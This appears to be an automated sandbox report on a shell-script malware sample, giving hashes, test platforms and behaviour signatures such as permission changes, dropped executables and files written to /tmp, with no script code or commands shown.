Analysis
-
max time kernel
29s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
28/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
-
Size
10KB
-
MD5
c27e3dbba79b6afbd8c32c4e50cffe76
-
SHA1
b2ec5ed7bd931b3a3b970e1d5d209d031219a547
-
SHA256
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040
-
SHA512
382804bca6a3c36dfe896726e67efbf903aede59316574bba39dd8b943f31a5caefcd2d666eb0bd1513c38a33fcde0e4d9245781648860f8c077675e5206f023
-
SSDEEP
192:mhN4hJ8oKCm/mPmympmFmO/1JdUJh1s8hN4hJRJdUJhXm/mPmympmFmWo:eoKnue3kYO/Isrue3kYWo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97